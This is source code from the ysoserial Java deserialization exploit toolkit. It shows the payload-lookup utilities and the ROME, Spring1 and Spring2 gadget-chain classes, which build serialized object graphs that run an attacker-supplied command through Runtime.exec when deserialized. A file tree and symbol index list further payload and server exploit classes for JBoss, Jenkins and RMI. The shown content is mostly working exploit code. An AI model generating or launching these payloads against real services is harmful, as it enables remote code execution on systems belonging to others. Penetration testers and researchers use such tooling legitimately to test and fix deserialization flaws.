package ysoserial.payloads;


import java.lang.reflect.Modifier;
import java.util.Iterator;
import java.util.Set;

import org.reflections.Reflections;

import ysoserial.GeneratePayload;


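@SuppressWarnings ( "rawtypes" )
public interface ObjectPayload <T> {

    /**
     * Returns the armed payload object to be serialized; per the original author's note it
     * will execute the specified command on deserialization.
     *
     * @param command payload argument; its format is defined by each implementation
     * @return the object graph to serialize
     * @throws Exception if the implementation cannot build the object
     */
    public T getObject ( String command ) throws Exception;

    /**
     * Static helpers for locating, instantiating and releasing payload implementations.
     */
    public static class Utils {

        /**
         * Finds the payload classes by classpath scanning of this interface's package.
         *
         * @return the concrete subtypes of ObjectPayload found by the scan; interfaces and
         *         abstract classes are removed from the result
         */
        public static Set<Class<? extends ObjectPayload>> getPayloadClasses () {
            final Reflections reflections = new Reflections(ObjectPayload.class.getPackage().getName());
            final Set<Class<? extends ObjectPayload>> payloadTypes = reflections.getSubTypesOf(ObjectPayload.class);
            for ( Iterator<Class<? extends ObjectPayload>> iterator = payloadTypes.iterator(); iterator.hasNext(); ) {
                Class<? extends ObjectPayload> pc = iterator.next();
                // Only instantiable types are useful to callers.
                if ( pc.isInterface() || Modifier.isAbstract(pc.getModifiers()) ) {
                    iterator.remove();
                }
            }
            return payloadTypes;
        }


        /**
         * Resolves a payload class by name.
         *
         * The name is tried as given first and, if no such class exists, again with the
         * payloads package prefix (the package of GeneratePayload plus ".payloads.").
         *
         * The ObjectPayload type check is applied to whichever lookup succeeded. Previously
         * the prefixed lookup returned its result directly and bypassed that check, so the
         * method could hand back a class that is not a payload.
         *
         * NOTE: Class.forName(String) initializes the class it loads, so static initializers
         * of the named class run before the type check. The callers visible here pass the
         * payload type string through unchanged.
         *
         * @param className fully qualified class name, or a simple name within the payloads
         *        package
         * @return the payload class, or null if no class was found or the class found does not
         *         implement ObjectPayload
         */
        public static Class<? extends ObjectPayload> getPayloadClass ( final String className ) {
            Class<?> found = lookup(className);
            if ( found == null ) {
                found = lookup(GeneratePayload.class.getPackage().getName() + ".payloads." + className);
            }
            if ( found == null || !ObjectPayload.class.isAssignableFrom(found) ) {
                return null;
            }
            return found.asSubclass(ObjectPayload.class);
        }


        /**
         * Loads a class by name, returning null instead of throwing when the lookup fails.
         * Catching Exception (not only ClassNotFoundException) keeps the original best-effort
         * behaviour of getPayloadClass.
         */
        private static Class<?> lookup ( final String name ) {
            try {
                return Class.forName(name);
            }
            catch ( Exception e ) {
                return null;
            }
        }


        /**
         * Instantiates the named payload type and asks it for its payload object.
         *
         * @param payloadType class name as accepted by getPayloadClass
         * @param payloadArg argument handed to ObjectPayload.getObject
         * @return the object returned by the payload's getObject
         * @throws IllegalArgumentException if the type cannot be resolved to a payload class,
         *         or if instantiation or getObject fails (the failure is attached as cause)
         */
        public static Object makePayloadObject ( String payloadType, String payloadArg ) {
            final Class<? extends ObjectPayload> payloadClass = getPayloadClass(payloadType);
            if ( payloadClass == null || !ObjectPayload.class.isAssignableFrom(payloadClass) ) {
                throw new IllegalArgumentException("Invalid payload type '" + payloadType + "'");
            }

            final Object payloadObject;
            try {
                final ObjectPayload payload = payloadClass.newInstance();
                payloadObject = payload.getObject(payloadArg);
            }
            catch ( Exception e ) {
                throw new IllegalArgumentException("Failed to construct payload", e);
            }
            return payloadObject;
        }


        /**
         * Calls release(object) on the payload if it implements ReleaseableObjectPayload;
         * does nothing otherwise.
         *
         * @param payload payload instance that produced the object
         * @param object object previously returned by the payload
         * @throws Exception whatever the payload's release method throws
         */
        @SuppressWarnings ( "unchecked" )
        public static void releasePayload ( ObjectPayload payload, Object object ) throws Exception {
            if ( payload instanceof ReleaseableObjectPayload ) {
                ( (ReleaseableObjectPayload) payload ).release(object);
            }
        }


        /**
         * Resolves the payload type by name, creates a fresh instance and releases the given
         * object through it.
         *
         * Failures during instantiation or release are printed to stderr and not rethrown.
         *
         * @param payloadType class name as accepted by getPayloadClass
         * @param payloadObject object to release
         * @throws IllegalArgumentException if the type cannot be resolved to a payload class
         */
        public static void releasePayload ( String payloadType, Object payloadObject ) {
            final Class<? extends ObjectPayload> payloadClass = getPayloadClass(payloadType);
            if ( payloadClass == null || !ObjectPayload.class.isAssignableFrom(payloadClass) ) {
                throw new IllegalArgumentException("Invalid payload type '" + payloadType + "'");
            }

            try {
                final ObjectPayload payload = payloadClass.newInstance();
                releasePayload(payload, payloadObject);
            }
            catch ( Exception e ) {
                // Deliberately best-effort: report and continue.
                e.printStackTrace();
            }

        }
    }
}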


================================================
FILE: src/main/java/ysoserial/payloads/ROME.java
================================================
package ysoserial.payloads;


import javax.xml.transform.Templates;

import com.sun.syndication.feed.impl.ObjectBean;

import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.PayloadRunner;

/**
 *
 * TemplatesImpl.getOutputProperties()
 * NativeMethodAccessorImpl.invoke0(Method, Object, Object[])
 * NativeMethodAccessorImpl.invoke(Object, Object[])
 * DelegatingMethodAccessorImpl.invoke(Object, Object[])
 * Method.invoke(Object, Object...)
 * ToStringBean.toString(String)
 * ToStringBean.toString()
 * ObjectBean.toString()
 * EqualsBean.beanHashCode()
 * ObjectBean.hashCode()
 * HashMap<K,V>.hash(Object)
 * HashMap<K,V>.readObject(ObjectInputStream)
 *
 * @author mbechler
 *
 */
@Dependencies("rome:rome:1.0")
@Authors({ Authors.MBECHLER })
public class ROME implements ObjectPayload<Object> {

    /**
     * Builds the ROME object graph described in the class comment.
     *
     * The templates object from Gadgets.createTemplatesImpl is wrapped in an ObjectBean typed
     * as Templates. That bean is wrapped in a second ObjectBean typed as ObjectBean, and the
     * outer bean is passed twice to Gadgets.makeMap. Per the documented chain, hashing the
     * outer bean during HashMap.readObject leads through ObjectBean.hashCode and
     * ToStringBean.toString to TemplatesImpl.getOutputProperties.
     *
     * @param command argument forwarded to Gadgets.createTemplatesImpl
     * @return the object returned by Gadgets.makeMap
     */
    public Object getObject ( String command ) throws Exception {
        final Object templates = Gadgets.createTemplatesImpl(command);
        final ObjectBean inner = new ObjectBean(Templates.class, templates);
        final ObjectBean outer = new ObjectBean(ObjectBean.class, inner);
        return Gadgets.makeMap(outer, outer);
    }


    /**
     * Command-line entry point; forwards this class and the arguments to PayloadRunner.run.
     */
    public static void main ( final String[] args ) throws Exception {
        PayloadRunner.run(ROME.class, args);
    }

}


================================================
FILE: src/main/java/ysoserial/payloads/ReleaseableObjectPayload.java
================================================
package ysoserial.payloads;


/**
 * An ObjectPayload whose generated object can be handed back for release.
 *
 * ObjectPayload.Utils.releasePayload calls {@link #release(Object)} only on payloads that
 * implement this interface. What a release does is up to each implementation (presumably
 * cleanup of resources created while building the object; confirm per implementation).
 *
 * @author mbechler
 *
 */
public interface ReleaseableObjectPayload<T> extends ObjectPayload<T> {

    /**
     * Releases an object previously produced by this payload.
     *
     * @param obj the object to release
     * @throws Exception if the release fails
     */
    void release( T obj ) throws Exception;
}


================================================
FILE: src/main/java/ysoserial/payloads/Spring1.java
================================================
package ysoserial.payloads;

import static java.lang.Class.forName;

import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Type;

import javax.xml.transform.Templates;

import org.springframework.beans.factory.ObjectFactory;

import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;

/*
	Gadget chain:

		ObjectInputStream.readObject()
			SerializableTypeWrapper.MethodInvokeTypeProvider.readObject()
				SerializableTypeWrapper.TypeProvider(Proxy).getType()
					AnnotationInvocationHandler.invoke()
						HashMap.get()
				ReflectionUtils.findMethod()
				SerializableTypeWrapper.TypeProvider(Proxy).getType()
					AnnotationInvocationHandler.invoke()
						HashMap.get()
				ReflectionUtils.invokeMethod()
					Method.invoke()
						Templates(Proxy).newTransformer()
							AutowireUtils.ObjectFactoryDelegatingInvocationHandler.invoke()
								ObjectFactory(Proxy).getObject()
									AnnotationInvocationHandler.invoke()
										HashMap.get()
								Method.invoke()
									TemplatesImpl.newTransformer()
										TemplatesImpl.getTransletInstance()
											TemplatesImpl.defineTransletClasses()
												TemplatesImpl.TransletClassLoader.defineClass()
													Pwner*(Javassist-generated).<static init>
														Runtime.exec()

 */

@SuppressWarnings({"rawtypes"})
@PayloadTest ( precondition = "isApplicableJavaVersion")
@Dependencies({"org.springframework:spring-core:4.1.4.RELEASE","org.springframework:spring-beans:4.1.4.RELEASE"})
@Authors({ Authors.FROHOFF })
public class Spring1 extends PayloadRunner implements ObjectPayload<Object> {

	/**
	 * Builds the object graph for the gadget chain listed in the comment above this class.
	 *
	 * The graph is assembled inside-out: a templates object, an ObjectFactory proxy that
	 * returns it, a Type/Templates proxy backed by Spring's
	 * ObjectFactoryDelegatingInvocationHandler, a TypeProvider proxy that returns that
	 * proxy, and finally a MethodInvokeTypeProvider, the object whose readObject starts the
	 * chain. The Spring classes involved are looked up by name and constructed reflectively.
	 *
	 * @param command argument forwarded to Gadgets.createTemplatesImpl
	 * @return the MethodInvokeTypeProvider instance to serialize
	 * @throws Exception if any reflective lookup or construction fails
	 */
	public Object getObject(final String command) throws Exception {
		final Object templates = Gadgets.createTemplatesImpl(command);

		// Proxy whose getObject entry maps to the templates object (the chain shows this
		// being served via AnnotationInvocationHandler.invoke -> HashMap.get).
		final ObjectFactory objectFactoryProxy =
				Gadgets.createMemoitizedProxy(Gadgets.createMap("getObject", templates), ObjectFactory.class);

		// Proxy implementing Type and Templates whose handler is Spring's
		// ObjectFactoryDelegatingInvocationHandler wrapping the ObjectFactory proxy.
		final Type typeTemplatesProxy = Gadgets.createProxy((InvocationHandler)
				Reflections.getFirstCtor("org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler")
					.newInstance(objectFactoryProxy), Type.class, Templates.class);

		// TypeProvider proxy whose getType entry maps to the proxy built above.
		final Object typeProviderProxy = Gadgets.createMemoitizedProxy(
				Gadgets.createMap("getType", typeTemplatesProxy),
				forName("org.springframework.core.SerializableTypeWrapper$TypeProvider"));

		// The instance is constructed with Object.getClass as its method and the methodName
		// field is overwritten afterwards.
		// NOTE(review): presumably the constructor needs a real Method to succeed; confirm
		// against the Spring source.
		final Constructor mitpCtor = Reflections.getFirstCtor("org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider");
		final Object mitp = mitpCtor.newInstance(typeProviderProxy, Object.class.getMethod("getClass", new Class[] {}), 0);
		Reflections.setFieldValue(mitp, "methodName", "newTransformer");

		return mitp;
	}

	/**
	 * Command-line entry point; forwards this class and the arguments to PayloadRunner.run.
	 */
	public static void main(final String[] args) throws Exception {
		PayloadRunner.run(Spring1.class, args);
	}

	/**
	 * Precondition named in the @PayloadTest annotation.
	 *
	 * @return the result of JavaVersion.isAnnInvHUniversalMethodImpl(); its exact meaning is
	 *         defined in JavaVersion and is not visible here
	 */
	public static boolean isApplicableJavaVersion() {
	    return JavaVersion.isAnnInvHUniversalMethodImpl();
    }
}


================================================
FILE: src/main/java/ysoserial/payloads/Spring2.java
================================================
package ysoserial.payloads;


import static java.lang.Class.forName;

import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Type;

import javax.xml.transform.Templates;

import org.springframework.aop.framework.AdvisedSupport;
import org.springframework.aop.target.SingletonTargetSource;

import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;


/**
 *
 * Just a PoC to prove that the ObjectFactory stuff is not the real problem.
 *
 * Gadget chain:
 * TemplatesImpl.newTransformer()
 * Method.invoke(Object, Object...)
 * AopUtils.invokeJoinpointUsingReflection(Object, Method, Object[])
 * JdkDynamicAopProxy.invoke(Object, Method, Object[])
 * $Proxy0.newTransformer()
 * Method.invoke(Object, Object...)
 * SerializableTypeWrapper$MethodInvokeTypeProvider.readObject(ObjectInputStream)
 *
 * @author mbechler
 */

@PayloadTest ( precondition = "isApplicableJavaVersion")
@Dependencies ( {
    "org.springframework:spring-core:4.1.4.RELEASE", "org.springframework:spring-aop:4.1.4.RELEASE",
    // test deps
    "aopalliance:aopalliance:1.0", "commons-logging:commons-logging:1.2"
} )
@Authors({ Authors.MBECHLER })
public class Spring2 extends PayloadRunner implements ObjectPayload<Object> {

    public Object getObject ( final String command ) throws Exception {
        final Object templates = Gadgets.createTemplatesImpl(command);

        AdvisedSupport as = new AdvisedSupport();
        as.setTargetSource(new SingletonTargetSource(templates));

        final Type typeTemplatesProxy = Gadgets.createProxy(
            (InvocationHandler) Reflections.getFirstCtor("org.springframework.aop.framework.JdkDynamicAopProxy").newInstance(as),
            Type.class,
            Templates.class);

        final Object typeProviderProxy = Gadgets.createMemoitizedProxy(
            Gadgets.createMap("getType", typeTemplatesProxy),
            forName("org.springframework.core.SerializableTypeWrapper$TypeProvider"));

        Object mitp = Reflections.createWithoutConstructor(forName("org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider"));
      
gitextract_xl98u19g/

├── .editorconfig
├── .github/
│   └── workflows/
│       └── publish.yml
├── .gitignore
├── .travis.yml
├── DISCLAIMER.txt
├── Dockerfile
├── LICENSE.txt
├── README.md
├── appveyor.yml
├── assembly.xml
├── pom.xml
└── src/
    ├── main/
    │   └── java/
    │       └── ysoserial/
    │           ├── Deserializer.java
    │           ├── GeneratePayload.java
    │           ├── Serializer.java
    │           ├── Strings.java
    │           ├── exploit/
    │           │   ├── JBoss.java
    │           │   ├── JMXInvokeMBean.java
    │           │   ├── JRMPClassLoadingListener.java
    │           │   ├── JRMPClient.java
    │           │   ├── JRMPListener.java
    │           │   ├── JSF.java
    │           │   ├── JenkinsCLI.java
    │           │   ├── JenkinsListener.java
    │           │   ├── JenkinsReverse.java
    │           │   └── RMIRegistryExploit.java
    │           ├── payloads/
    │           │   ├── AspectJWeaver.java
    │           │   ├── BeanShell1.java
    │           │   ├── C3P0.java
    │           │   ├── Click1.java
    │           │   ├── Clojure.java
    │           │   ├── CommonsBeanutils1.java
    │           │   ├── CommonsCollections1.java
    │           │   ├── CommonsCollections2.java
    │           │   ├── CommonsCollections3.java
    │           │   ├── CommonsCollections4.java
    │           │   ├── CommonsCollections5.java
    │           │   ├── CommonsCollections6.java
    │           │   ├── CommonsCollections7.java
    │           │   ├── DynamicDependencies.java
    │           │   ├── FileUpload1.java
    │           │   ├── Groovy1.java
    │           │   ├── Hibernate1.java
    │           │   ├── Hibernate2.java
    │           │   ├── JBossInterceptors1.java
    │           │   ├── JRMPClient.java
    │           │   ├── JRMPListener.java
    │           │   ├── JSON1.java
    │           │   ├── JavassistWeld1.java
    │           │   ├── Jdk7u21.java
    │           │   ├── Jython1.java
    │           │   ├── MozillaRhino1.java
    │           │   ├── MozillaRhino2.java
    │           │   ├── Myfaces1.java
    │           │   ├── Myfaces2.java
    │           │   ├── ObjectPayload.java
    │           │   ├── ROME.java
    │           │   ├── ReleaseableObjectPayload.java
    │           │   ├── Spring1.java
    │           │   ├── Spring2.java
    │           │   ├── URLDNS.java
    │           │   ├── Vaadin1.java
    │           │   ├── Wicket1.java
    │           │   ├── annotation/
    │           │   │   ├── Authors.java
    │           │   │   ├── Dependencies.java
    │           │   │   └── PayloadTest.java
    │           │   └── util/
    │           │       ├── ClassFiles.java
    │           │       ├── Gadgets.java
    │           │       ├── JavaVersion.java
    │           │       ├── PayloadRunner.java
    │           │       └── Reflections.java
    │           └── secmgr/
    │               ├── DelegateSecurityManager.java
    │               └── ExecCheckingSecurityManager.java
    └── test/
        └── java/
            └── ysoserial/
                ├── CiTest.java
                └── test/
                    ├── CustomDeserializer.java
                    ├── CustomPayloadArgs.java
                    ├── CustomTest.java
                    ├── WrappedTest.java
                    ├── exploit/
                    │   └── RMIRegistryExploitTest.java
                    ├── payloads/
                    │   ├── CommandExecTest.java
                    │   ├── FileUploadTest.java
                    │   ├── JRMPReverseConnectSMTest.java
                    │   ├── JRMPReverseConnectTest.java
                    │   ├── MyfacesTest.java
                    │   ├── PayloadsTest.java
                    │   ├── RemoteClassLoadingTest.java
                    │   └── TestHarnessTest.java
                    └── util/
                        ├── Callables.java
                        ├── Files.java
                        ├── GadgetsTest.java
                        ├── OS.java
                        └── Throwables.java
SYMBOL INDEX (458 symbols across 79 files)

FILE: src/main/java/ysoserial/Deserializer.java
  class Deserializer (line 11) | public class Deserializer implements Callable<Object> {
    method Deserializer (line 14) | public Deserializer(byte[] bytes) { this.bytes = bytes; }
    method call (line 16) | public Object call() throws Exception {
    method deserialize (line 20) | public static Object deserialize(final byte[] serialized) throws IOExc...
    method deserialize (line 25) | public static Object deserialize(final InputStream in) throws ClassNot...
    method main (line 30) | public static void main(String[] args) throws ClassNotFoundException, ...

FILE: src/main/java/ysoserial/GeneratePayload.java
  class GeneratePayload (line 11) | @SuppressWarnings("rawtypes")
    method main (line 16) | public static void main(final String[] args) {
    method printUsage (line 46) | private static void printUsage() {

FILE: src/main/java/ysoserial/Serializer.java
  class Serializer (line 9) | public class Serializer implements Callable<byte[]> {
    method Serializer (line 11) | public Serializer(Object object) {
    method call (line 15) | public byte[] call() throws Exception {
    method serialize (line 19) | public static byte[] serialize(final Object obj) throws IOException {
    method serialize (line 25) | public static void serialize(final Object obj, final OutputStream out)...

FILE: src/main/java/ysoserial/Strings.java
  class Strings (line 10) | public class Strings {
    method join (line 11) | public static String join(Iterable<String> strings, String sep, String...
    method repeat (line 24) | public static String repeat(String str, int num) {
    method formatTable (line 30) | public static List<String> formatTable(List<String[]> rows) {
    class ToStringComparator (line 52) | public static class ToStringComparator implements Comparator<Object> {
      method compare (line 53) | public int compare(Object o1, Object o2) { return o1.toString().comp...

FILE: src/main/java/ysoserial/exploit/JBoss.java
  class JBoss (line 96) | @SuppressWarnings ( {
    method main (line 101) | public static void main ( String[] args ) {
    method doRun (line 131) | private static void doRun ( URI u, final Object payloadObject, String ...
    method cleanup (line 166) | private static void cleanup ( ConnectionProvider instance, ConnectionP...
    method getConnection (line 204) | private static ConnectionHandlerFactory getConnection ( SocketAddress ...
    method getChannel (line 248) | private static Channel getChannel ( ConnectionProviderContextImpl cont...
    method makeVersionedConnection (line 271) | private static VersionedConnection makeVersionedConnection ( Channel c )
    method doExploit (line 282) | private static void doExploit ( final Object payloadObject, MBeanServe...
    class ConsoleLogHandler (line 320) | private static final class ConsoleLogHandler extends Handler {
      method publish (line 323) | @Override
      method flush (line 329) | @Override
      method close (line 335) | @Override
    class ConnectionHandlerContextImpl (line 339) | @SuppressWarnings({"deprecation"})
      method ConnectionHandlerContextImpl (line 345) | public ConnectionHandlerContextImpl ( ConnectionProviderContextImpl ...
      method remoteClosed (line 350) | public void remoteClosed () {}
      method getServiceOpenListener (line 353) | public OpenListener getServiceOpenListener ( String serviceType ) {
      method getRegisteredService (line 358) | public RegisteredService getRegisteredService ( String serviceType ) {
      method getConnectionProviderContext (line 363) | public ConnectionProviderContext getConnectionProviderContext () {
      method getConnection (line 368) | public Connection getConnection () {
    class ConnectionProviderContextImpl (line 374) | private static final class ConnectionProviderContextImpl implements Co...
      method ConnectionProviderContextImpl (line 382) | public ConnectionProviderContextImpl ( OptionMap opts, String endpoi...
      method getXnioWorker (line 398) | public XnioWorker getXnioWorker () {
      method getXnio (line 403) | public Xnio getXnio () {
      method getExecutor (line 408) | public Executor getExecutor () {
      method getEndpoint (line 413) | public Endpoint getEndpoint () {
      method accept (line 418) | public void accept ( ConnectionHandlerFactory connectionHandlerFacto...

FILE: src/main/java/ysoserial/exploit/JMXInvokeMBean.java
  class JMXInvokeMBean (line 16) | public class JMXInvokeMBean {
    method main (line 18) | public static void main(String[] args) throws Exception {

FILE: src/main/java/ysoserial/exploit/JRMPClassLoadingListener.java
  class JRMPClassLoadingListener (line 28) | public class JRMPClassLoadingListener {
    method main (line 30) | public static final void main ( final String[] args ) {

FILE: src/main/java/ysoserial/exploit/JRMPClient.java
  class JRMPClient (line 31) | @SuppressWarnings ( {
    method main (line 36) | public static final void main ( final String[] args ) {
    method makeDGCCall (line 55) | public static void makeDGCCall ( String hostname, int port, Object pay...
    class MarshalOutputStream (line 98) | static final class MarshalOutputStream extends ObjectOutputStream {
      method MarshalOutputStream (line 103) | public MarshalOutputStream (OutputStream out, URL u) throws IOExcept...
      method MarshalOutputStream (line 108) | MarshalOutputStream ( OutputStream out ) throws IOException {
      method annotateClass (line 112) | @Override
      method annotateProxyClass (line 134) | @Override

FILE: src/main/java/ysoserial/exploit/JRMPListener.java
  class JRMPListener (line 45) | @SuppressWarnings ( {
    method JRMPListener (line 59) | public JRMPListener ( int port, Object payloadObject ) throws NumberFo...
    method JRMPListener (line 65) | public JRMPListener (int port, String className, URL classpathUrl) thr...
    method waitFor (line 73) | public boolean waitFor ( int i ) {
    method close (line 93) | public void close () {
    method main (line 105) | public static final void main ( final String[] args ) {
    method run (line 129) | public void run () {
    method doMessage (line 216) | private void doMessage ( Socket s, DataInputStream in, DataOutputStrea...
    method doCall (line 244) | private void doCall ( DataInputStream in, DataOutputStream out, Object...
    method makeDummyObject (line 296) | @SuppressWarnings({"deprecation"})
    class Dummy (line 313) | public static class Dummy implements Serializable {

FILE: src/main/java/ysoserial/exploit/JSF.java
  class JSF (line 35) | public class JSF {
    method main (line 37) | public static void main ( String[] args ) {

FILE: src/main/java/ysoserial/exploit/JenkinsCLI.java
  class JenkinsCLI (line 41) | public class JenkinsCLI {
    method main (line 42) | public static final void main ( final String[] args ) {
    method getPropertyCallable (line 73) | public static Callable<?, ?> getPropertyCallable ( final Object prop )
    method getCliPort (line 85) | public static InetSocketAddress getCliPort ( String jenkinsUrl ) throw...
    method openChannel (line 103) | public static Channel openChannel ( InetSocketAddress isa ) throws IOE...

FILE: src/main/java/ysoserial/exploit/JenkinsListener.java
  class JenkinsListener (line 48) | @SuppressWarnings ( {
    method main (line 53) | public static final void main ( final String[] args ) {
    method makeIsPresentOnRemoteCallable (line 117) | private static Object makeIsPresentOnRemoteCallable ( int oid, Object ...
    method parseObjIdAndExploit (line 128) | private static void parseObjIdAndExploit ( final String[] args, final ...
    method exploit (line 165) | private static void exploit ( InetSocketAddress isa, long obj, int o1,...

FILE: src/main/java/ysoserial/exploit/JenkinsReverse.java
  class JenkinsReverse (line 27) | public class JenkinsReverse {
    method main (line 29) | public static final void main ( final String[] args ) {

FILE: src/main/java/ysoserial/exploit/RMIRegistryExploit.java
  class RMIRegistryExploit (line 27) | @SuppressWarnings({"rawtypes", "unchecked"})
    class TrustAllSSL (line 29) | private static class TrustAllSSL implements X509TrustManager {
      method getAcceptedIssuers (line 31) | public X509Certificate[] getAcceptedIssuers() { return ANY_CA; }
      method checkServerTrusted (line 32) | public void checkServerTrusted(final X509Certificate[] c, final Stri...
      method checkClientTrusted (line 33) | public void checkClientTrusted(final X509Certificate[] c, final Stri...
    class RMISSLClientSocketFactory (line 36) | private static class RMISSLClientSocketFactory implements RMIClientSoc...
      method createSocket (line 37) | public Socket createSocket(String host, int port) throws IOException {
    method main (line 49) | public static void main(final String[] args) throws Exception {
    method exploit (line 68) | public static void exploit(final Registry registry,

FILE: src/main/java/ysoserial/payloads/AspectJWeaver.java
  class AspectJWeaver (line 41) | @PayloadTest(skip="non RCE")
    method getObject (line 48) | public Serializable getObject(final String command) throws Exception {
    method main (line 103) | public static void main(String[] args) throws Exception {

FILE: src/main/java/ysoserial/payloads/BeanShell1.java
  class BeanShell1 (line 22) | @SuppressWarnings({ "rawtypes", "unchecked" })
    method getObject (line 27) | public PriorityQueue getObject(String command) throws Exception {
    method main (line 59) | public static void main(final String[] args) throws Exception {

FILE: src/main/java/ysoserial/payloads/C3P0.java
  class C3P0 (line 41) | @PayloadTest ( harness="ysoserial.test.payloads.RemoteClassLoadingTest" )
    method getObject (line 45) | public Object getObject ( String command ) throws Exception {
    class PoolSource (line 62) | private static final class PoolSource implements ConnectionPoolDataSou...
      method PoolSource (line 67) | public PoolSource ( String className, String url ) {
      method getReference (line 72) | public Reference getReference () throws NamingException {
      method getLogWriter (line 76) | public PrintWriter getLogWriter () throws SQLException {return null;}
      method setLogWriter (line 77) | public void setLogWriter ( PrintWriter out ) throws SQLException {}
      method setLoginTimeout (line 78) | public void setLoginTimeout ( int seconds ) throws SQLException {}
      method getLoginTimeout (line 79) | public int getLoginTimeout () throws SQLException {return 0;}
      method getParentLogger (line 80) | public Logger getParentLogger () throws SQLFeatureNotSupportedExcept...
      method getPooledConnection (line 81) | public PooledConnection getPooledConnection () throws SQLException {...
      method getPooledConnection (line 82) | public PooledConnection getPooledConnection ( String user, String pa...
    method main (line 87) | public static void main ( final String[] args ) throws Exception {

FILE: src/main/java/ysoserial/payloads/Click1.java
  class Click1 (line 47) | @SuppressWarnings({ "rawtypes", "unchecked" })
    method getObject (line 52) | public Object getObject(final String command) throws Exception {
    method main (line 78) | public static void main(final String[] args) throws Exception {

FILE: src/main/java/ysoserial/payloads/Clojure.java
  class Clojure (line 27) | @Dependencies({"org.clojure:clojure:1.8.0"})
    method getObject (line 31) | public Map<?, ?> getObject(final String command) throws Exception {
    method main (line 70) | public static void main(final String[] args) throws Exception {

FILE: src/main/java/ysoserial/payloads/CommonsBeanutils1.java
  class CommonsBeanutils1 (line 14) | @SuppressWarnings({ "rawtypes", "unchecked" })
    method getObject (line 19) | public Object getObject(final String command) throws Exception {
    method main (line 41) | public static void main(final String[] args) throws Exception {

FILE: src/main/java/ysoserial/payloads/CommonsCollections1.java
  class CommonsCollections1 (line 43) | @SuppressWarnings({"rawtypes", "unchecked"})
    method getObject (line 49) | public InvocationHandler getObject(final String command) throws Except...
    method main (line 80) | public static void main(final String[] args) throws Exception {
    method isApplicableJavaVersion (line 84) | public static boolean isApplicableJavaVersion() {

FILE: src/main/java/ysoserial/payloads/CommonsCollections2.java
  class CommonsCollections2 (line 27) | @SuppressWarnings({ "rawtypes", "unchecked" })
    method getObject (line 32) | public Queue<Object> getObject(final String command) throws Exception {
    method main (line 54) | public static void main(final String[] args) throws Exception {

FILE: src/main/java/ysoserial/payloads/CommonsCollections3.java
  class CommonsCollections3 (line 29) | @SuppressWarnings({"rawtypes", "unchecked", "restriction"})
    method getObject (line 35) | public Object getObject(final String command) throws Exception {
    method main (line 61) | public static void main(final String[] args) throws Exception {
    method isApplicableJavaVersion (line 65) | public static boolean isApplicableJavaVersion() {

FILE: src/main/java/ysoserial/payloads/CommonsCollections4.java
  class CommonsCollections4 (line 26) | @SuppressWarnings({ "rawtypes", "unchecked", "restriction" })
    method getObject (line 31) | public Queue<Object> getObject(final String command) throws Exception {
    method main (line 61) | public static void main(final String[] args) throws Exception {

FILE: src/main/java/ysoserial/payloads/CommonsCollections5.java
  class CommonsCollections5 (line 51) | @SuppressWarnings({"rawtypes", "unchecked"})
    method getObject (line 57) | public BadAttributeValueExpException getObject(final String command) t...
    method main (line 91) | public static void main(final String[] args) throws Exception {
    method isApplicableJavaVersion (line 95) | public static boolean isApplicableJavaVersion() {

FILE: src/main/java/ysoserial/payloads/CommonsCollections6.java
  class CommonsCollections6 (line 36) | @SuppressWarnings({"rawtypes", "unchecked"})
    method getObject (line 41) | public Serializable getObject(final String command) throws Exception {
    method main (line 106) | public static void main(final String[] args) throws Exception {

FILE: src/main/java/ysoserial/payloads/CommonsCollections7.java
  class CommonsCollections7 (line 35) | @SuppressWarnings({"rawtypes", "unchecked"})
    method getObject (line 41) | public Hashtable getObject(final String command) throws Exception {
    method main (line 84) | public static void main(final String[] args) throws Exception {

FILE: src/main/java/ysoserial/payloads/DynamicDependencies.java
  type DynamicDependencies (line 8) | public interface DynamicDependencies {

FILE: src/main/java/ysoserial/payloads/FileUpload1.java
  class FileUpload1 (line 40) | @Dependencies ( {
    method isApplicableJavaVersion (line 47) | public static boolean isApplicableJavaVersion() {
    method getObject (line 51) | public DiskFileItem getObject ( String command ) throws Exception {
    method release (line 76) | public void release ( DiskFileItem obj ) throws Exception {
    method copyAndDelete (line 82) | private static DiskFileItem copyAndDelete ( String copyAndDelete, Stri...
    method write (line 88) | private static DiskFileItem write ( String dir, byte[] data ) throws I...
    method writePre131 (line 94) | private static DiskFileItem writePre131 ( String file, byte[] data ) t...
    method makePayload (line 99) | private static DiskFileItem makePayload ( int thresh, String repoPath,...
    method main (line 115) | public static void main ( final String[] args ) throws Exception {

FILE: src/main/java/ysoserial/payloads/Groovy1.java
  class Groovy1 (line 29) | @SuppressWarnings({ "rawtypes", "unchecked" })
    method getObject (line 34) | public InvocationHandler getObject(final String command) throws Except...
    method main (line 44) | public static void main(final String[] args) throws Exception {

FILE: src/main/java/ysoserial/payloads/Hibernate1.java
  class Hibernate1 (line 44) | @Authors({ Authors.MBECHLER })
    method isApplicableJavaVersion (line 47) | public static boolean isApplicableJavaVersion() {
    method getDependencies (line 51) | public static String[] getDependencies () {
    method makeGetter (line 67) | public static Object makeGetter ( Class<?> tplClass, String method ) t...
    method makeHibernate4Getter (line 76) | public static Object makeHibernate4Getter ( Class<?> tplClass, String ...
    method makeHibernate5Getter (line 96) | public static Object makeHibernate5Getter ( Class<?> tplClass, String ...
    method getObject (line 108) | public Object getObject ( String command ) throws Exception {
    method makeCaller (line 115) | static Object makeCaller ( Object tpl, Object getters ) throws NoSuchM...
    method makeHibernate45Caller (line 124) | static Object makeHibernate45Caller ( Object tpl, Object getters ) thr...
    method makeHibernate3Caller (line 148) | static Object makeHibernate3Caller ( Object tpl, Object getters ) thro...
    method main (line 182) | public static void main ( final String[] args ) throws Exception {

